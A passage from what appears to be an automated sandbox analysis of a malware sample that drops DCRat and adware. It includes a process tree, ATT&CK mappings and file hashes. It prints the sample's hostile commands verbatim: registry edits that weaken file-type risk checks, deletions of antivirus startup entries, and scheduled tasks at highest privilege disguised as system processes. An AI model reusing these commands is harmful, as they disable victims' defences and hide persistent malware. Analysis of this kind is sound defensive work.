Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64
6⤵
PID:1996

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64
6⤵
PID:1304

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64
6⤵
PID:1696

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlvknlg64.exe" /f /reg:32
6⤵
PID:2156

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlls.dll" /f /reg:32
6⤵
PID:2180

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlservice.exe" /f /reg:32
6⤵
PID:2204

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "C:\Windows\system32\rlls64.dll" /f /reg:32
6⤵
PID:2144

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "C:\Windows\system32\rlls.dll" /f /reg:32
6⤵
PID:2080

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32
6⤵
PID:2064

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
6⤵
PID:1972

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64
6⤵
PID:1220

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32
6⤵
PID:2228

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32
6⤵
PID:2276

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge" /f /reg:32
6⤵
PID:2288

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32
6⤵
PID:2296

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32
6⤵
PID:2304

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32
6⤵
PID:2320

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32
6⤵
PID:2312

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32
6⤵
PID:2328

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
6⤵
PID:2256

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32
6⤵
PID:2248

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32
6⤵
PID:2336

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32
6⤵
PID:2356

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32
6⤵
PID:2364

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32
6⤵
PID:2376

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32
6⤵
PID:2384

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
6⤵
PID:2392

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64
6⤵
PID:2408

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64
6⤵
PID:2416

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
6⤵
PID:2400

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32
6⤵
PID:2348

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64
6⤵
PID:2424

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64
6⤵
PID:2432

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64
6⤵
PID:2440

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64
6⤵
PID:2456

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64
6⤵
PID:2448

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64
6⤵
PID:2464

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64
6⤵
PID:2472

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64
6⤵
PID:2488

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64
6⤵
PID:2480

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
6⤵
PID:2496

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
6⤵
PID:2504

C:\Users\Admin\AppData\Local\Temp\RarSFX1\DCRatBuild.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\DCRatBuild.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\dhcpsaves\tps2B2Gj9GPs142vdn0RRNmo7TCmJx.vbe"
5⤵
PID:972

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\dhcpsaves\n8tsKIn9YulvW1As66RFt2MChamfLY.bat" "
6⤵
- Loads dropped DLL
PID:1444

C:\dhcpsaves\PW2a6TXDXnEuQpMxlOaX.exe
PW2a6TXDXnEuQpMxlOaX.exe -p6c20b97402144f3894cd29cb011475a2c8080698
7⤵
- Executes dropped EXE
PID:1616

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\dhcpsaves\QbblFawcquSmo9w9jHx7ThjF81DeJd.vbe"
8⤵
PID:1164

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\dhcpsaves\loX07wGhmQuKxdsDKyefFvT1GMNrmw.bat" "
9⤵
- Loads dropped DLL
PID:2092

C:\dhcpsaves\dllsession.exe
"C:\dhcpsaves\dllsession.exe"
10⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\ProgramData\Favorites\explorer.exe'" /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:1556

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Documents and Settings\conhost.exe'" /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:1820

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Idle.exe'" /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:784

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\ja-JP\lsass.exe'" /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:1980

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\dhcpsaves\WmiPrvSE.exe'" /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:2080

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\dhcpsaves\cmd.exe'" /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:2176

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\Idle.exe'" /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:2228

C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\Idle.exe
"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\Idle.exe"
11⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1477235031-365797536700598550-17461453825553543381844634807-1859424873986035275"
1⤵
PID:436

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "866309378207558756448612848144104070-675042705-18658801527084901451518120478"
1⤵
PID:612

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Security Software Discovery

T1063

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Desktop.exe

Filesize
1.2MB

MD5
901803834661dc5090b7ae25052e66cf

SHA1
3c6ad4f28728e5f532d8ea9cfa1f17facacb1d48

SHA256
21e546b90c2f7ee47d341ce26e51247440a4c4148f7715c21c13bf8e5f0f7908

SHA512
407ade1ecb1e8d84e081bd299c467b471bebc9a5f9d8da81b205518dbc79309c108aa54420b3d16431403ad25cfe12909f19c0afa445f5151d391dd8c7813016

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\ANTIAV~1.DAT

Filesize
1.9MB

MD5
19ef652af3c93b66a752f7be1c370721

SHA1
acb03464ef4a9d2feca8a566b7ec2b72b5e2b0bf

SHA256
7dcef38ecd822f3660a89320a4c02d298d98575e0dce8e460193bf6f1d8259e3

SHA512
14f661074d528025473dfe80643b026212cdf1a096a8a0e85fa78d62c9a0ed1bb95108bcc22c9149c57c9dbf18b968582f12736893452c1d068d6dd1b04b6b26

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\Desktop.exe

Filesize
1.2MB

MD5
901803834661dc5090b7ae25052e66cf

SHA1
3c6ad4f28728e5f532d8ea9cfa1f17facacb1d48

SHA256
21e546b90c2f7ee47d341ce26e51247440a4c4148f7715c21c13bf8e5f0f7908

SHA512
407ade1ecb1e8d84e081bd299c467b471bebc9a5f9d8da81b205518dbc79309c108aa54420b3d16431403ad25cfe12909f19c0afa445f5151d391dd8c7813016

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_1.zip

Filesize
999KB

MD5
304da79c75c09e969434bae70dd8f73d

SHA1
ef76f679805f4bbec6a92308543b0733522786e4

SHA256
41de8a9a1090aaca4ba10153bed00a94d4249fe2bd902862742c4f991fe25cd1

SHA512
d113cbd658c489fe2505acf50bb754ba9ce1302ab35f262f2aeac1205f6797c5f9ca694d324057955c981ae79411abf985968457bb76515eeba01a7067cc3435

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_2.zip

Filesize
999KB

MD5
6edf6004c36f7a124d6d8dcd37074ec0

SHA1
dcd0b650db1a7a1c84f93a3e64f7370918e2933f

SHA256
f2602ff02bd73681da65e5393c993c8163da93c302fd7de0a2978ede3e91a466

SHA512
14d8cf21fd67b32ce55c6ef404163902ae1b0dae15ee5ca9913b8f4ec2e9da243c6729c7e94ada9df37f6a7aed768c3009ed0a3970d4f38934dcfaff902777f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_3.zip

Filesize
999KB

MD5
4fbb225835cae95b837b51a1e339a7a6

SHA1
e73682a508fecef5f7a0879830bf42eef2731b04

SHA256
1e363bd7358ef0d141393be9373c282363b6e20381cfec2be7b5fef1f6268938

SHA512
e63a9d182d61c6ab4ef3221e71af84b61764af549c239122965611dcd1568be61780b9755df1a12e9fb653b1aa6111f9a14aa35f996732f4384543ec07ddc2f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_4.zip

Filesize
999KB

MD5
142084995b227d0bd1f7b4bee07e9ead

SHA1
cc3e8ef447a7f8c914cb8a28fa04c3730d4961c7

SHA256
88a9918f69cba628091e350ab1c84e6f25acd0b813483d6de500b47f107e0c95

SHA512
e30ee7c70eab4ab77e2ac75f17c7c64ea34378f8ab4de24c5b11634e2e1698160f2cdc7b0392986654dd76714d4e268127ad6b6cfd7b19a7125e847f47c993ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_5.zip

Filesize
2.4MB

MD5
318c9bd2ddb8110a170454ccb998fdb3

SHA1
b80ccb1433878382707887c274246d9abdde29c5

SHA256
0ef05994b3f6fae74c263910e506b4cd2403e40d486e55785285d02649a7d8cc

SHA512
8911b5dc761e8b874fad2eb89dd589d07900d94842a01775e14faf10bb0bb65e301616219d6a4333c42b57caa949c1a6066709358ed1d6bd776126a79f6b9673

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.bin

Filesize
2.4MB

MD5
2ffeae0ee13f34fc23b268718923bb6b

SHA1
3a624555f943970e9ff6866468d32e4da1a909ec

SHA256
193f24f22df4db0e126ff9e065a3d9789be3735fdf32035d309cb4b4dda2bc6a

SHA512
152de994ffd96046ca9170aaf3d579d5c841e22e2737bb5d9d7a0291db720d9342138444212ae65f8d6dc9c5043fc2d3a4a9362e605a189819062f0635d0043f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.bat

Filesize
484B

MD5
93b2443439a4f6d76b6a7b180fbe0fac

SHA1
30917e4c6b1f51e8a5498886322e81a1cc5c4894

SHA256
c57f68afcace69a27e05fca38132b029590b333bc9338ee19b2796429e429cc3

SHA512
cc1ed2effb514637ea0e52e86a0d26cbad7b058bfd62f95e52056b7fdd55370744cb6485fa56993362f998457a8ba1e8afb6b23da08afa3d83b8b5191b1e8a72

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe

Filesize
58KB

MD5
b7352a9cde99367d4053d0de7431a181

SHA1
32d2046f588a98c1ea0fee63d1c275b34497ddea

SHA256
9dd0d5b5b5efe2433cfcbc3044d0219ffeb517c2cde4e705e52719ed15660a00

SHA512
8b6cee0cdd86c616e6a5e65bb08ad9df2926b5fa16b7186166e6fb69ca8eb3f1cef98f3e03ab2ae43c082b6acae82edd0a45d71df14b504ae7bf82da049796df

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe

Filesize
58KB

MD5
b7352a9cde99367d4053d0de7431a181

SHA1
32d2046f588a98c1ea0fee63d1c275b34497ddea

SHA256
9dd0d5b5b5efe2433cfcbc3044d0219ffeb517c2cde4e705e52719ed15660a00

SHA512
8b6cee0cdd86c616e6a5e65bb08ad9df2926b5fa16b7186166e6fb69ca8eb3f1cef98f3e03ab2ae43c082b6acae82edd0a45d71df14b504ae7bf82da049796df

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\DCRatBuild.exe

Filesize
834KB

MD5
b4d1f6f0a9204dc69ec49afe9ab00a72

SHA1
5a2cfeabf3d1c8651d8b482732d45dcfd508c006

SHA256
e05a3e30d5d9c81b397f7caffbd7624faa800681e2260ecd5d3f7b981c24f34e

SHA512
06e7e671904ebef5cca378b58c16c2275401699a1b51ef85a15d8f6ec68c91c4d884d0edf71a63d858268aedec05b545e3aebcccbebd9b1664d76de20523d3d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\DCRatBuild.exe

Filesize
834KB

MD5
b4d1f6f0a9204dc69ec49afe9ab00a72

SHA1
5a2cfeabf3d1c8651d8b482732d45dcfd508c006

SHA256
e05a3e30d5d9c81b397f7caffbd7624faa800681e2260ecd5d3f7b981c24f34e

SHA512
06e7e671904ebef5cca378b58c16c2275401699a1b51ef85a15d8f6ec68c91c4d884d0edf71a63d858268aedec05b545e3aebcccbebd9b1664d76de20523d3d4

Download Submit
C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe

Filesize
7KB

MD5
463dba63615255f9e2f40e4323028f1d

SHA1
2cc71a0d934dfbd409349db59dc51d4b12bca3ca

SHA256
4eaf8bad5d130db8b39d8a1561f08ec457c4ff771eeda460a26cd432f42e8cfd

SHA512
1cd57f19c8f81eee36f647e4557a465075220b89b5fc46ef7992189c85f040fbfee7e62da9d896f618e176340423a634a9ac5b2085edfab1907672f65bcc7100

Download Submit
C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe

Filesize
7KB

MD5
463dba63615255f9e2f40e4323028f1d

SHA1
2cc71a0d934dfbd409349db59dc51d4b12bca3ca

SHA256
4eaf8bad5d130db8b39d8a1561f08ec457c4ff771eeda460a26cd432f42e8cfd

SHA512
1cd57f19c8f81eee36f647e4557a465075220b89b5fc46ef7992189c85f040fbfee7e62da9d896f618e176340423a634a9ac5b2085edfab1907672f65bcc7100

Download Submit
C:\Users\Admin\AppData\Roaming\1337\antiav.bat

Filesize
13KB

MD5
96e10d048d34ae83c462c3cc71c21314

SHA1
dc494c62fb67efcc318e54ca9ef15ea87ad24286

SHA256
c2686ead4dec80bdadd8c19e3128b70cf2512b1d016a80d4abea7109adf989e3

SHA512
f58ab0e108314f45c8b8b889a1958faf9b666de46f2c216b6f3737bb93c459e480d6a92184545a3bd9ab4104f955ef9d4fa9da3823d8b30191fa6770e126e4c3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f37a546bea36bfdbf192ef4dba91906a

SHA1
c2e6b045938ba6c3b3037db279079b2696ce44d7

SHA256
da51a34a8390f0d9660fd0381dd675016db9f76dab0f8b42bb030ef3ca0e4b8d

SHA512
a8430fea0ce4955d0805906af6530fc7936d6e7f2f0a9a2f5ac1dca65ff8c0a0325e173273ec42a50f58abd89ed6b4aa45b97a1d159d34e1718231094c985e88

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f37a546bea36bfdbf192ef4dba91906a

SHA1
c2e6b045938ba6c3b3037db279079b2696ce44d7

SHA256
da51a34a8390f0d9660fd0381dd675016db9f76dab0f8b42bb030ef3ca0e4b8d

SHA512
a8430fea0ce4955d0805906af6530fc7936d6e7f2f0a9a2f5ac1dca65ff8c0a0325e173273ec42a50f58abd89ed6b4aa45b97a1d159d34e1718231094c985e88

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f37a546bea36bfdbf192ef4dba91906a

SHA1
c2e6b045938ba6c3b3037db279079b2696ce44d7

SHA256
da51a34a8390f0d9660fd0381dd675016db9f76dab0f8b42bb030ef3ca0e4b8d

SHA512
a8430fea0ce4955d0805906af6530fc7936d6e7f2f0a9a2f5ac1dca65ff8c0a0325e173273ec42a50f58abd89ed6b4aa45b97a1d159d34e1718231094c985e88

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f37a546bea36bfdbf192ef4dba91906a

SHA1
c2e6b045938ba6c3b3037db279079b2696ce44d7

SHA256
da51a34a8390f0d9660fd0381dd675016db9f76dab0f8b42bb030ef3ca0e4b8d

SHA512
a8430fea0ce4955d0805906af6530fc7936d6e7f2f0a9a2f5ac1dca65ff8c0a0325e173273ec42a50f58abd89ed6b4aa45b97a1d159d34e1718231094c985e88

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f37a546bea36bfdbf192ef4dba91906a

SHA1
c2e6b045938ba6c3b3037db279079b2696ce44d7

SHA256
da51a34a8390f0d9660fd0381dd675016db9f76dab0f8b42bb030ef3ca0e4b8d

SHA512
a8430fea0ce4955d0805906af6530fc7936d6e7f2f0a9a2f5ac1dca65ff8c0a0325e173273ec42a50f58abd89ed6b4aa45b97a1d159d34e1718231094c985e88

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f37a546bea36bfdbf192ef4dba91906a

SHA1
c2e6b045938ba6c3b3037db279079b2696ce44d7

SHA256
da51a34a8390f0d9660fd0381dd675016db9f76dab0f8b42bb030ef3ca0e4b8d

SHA512
a8430fea0ce4955d0805906af6530fc7936d6e7f2f0a9a2f5ac1dca65ff8c0a0325e173273ec42a50f58abd89ed6b4aa45b97a1d159d34e1718231094c985e88

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f37a546bea36bfdbf192ef4dba91906a

SHA1
c2e6b045938ba6c3b3037db279079b2696ce44d7

SHA256
da51a34a8390f0d9660fd0381dd675016db9f76dab0f8b42bb030ef3ca0e4b8d

SHA512
a8430fea0ce4955d0805906af6530fc7936d6e7f2f0a9a2f5ac1dca65ff8c0a0325e173273ec42a50f58abd89ed6b4aa45b97a1d159d34e1718231094c985e88

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f37a546bea36bfdbf192ef4dba91906a

SHA1
c2e6b045938ba6c3b3037db279079b2696ce44d7

SHA256
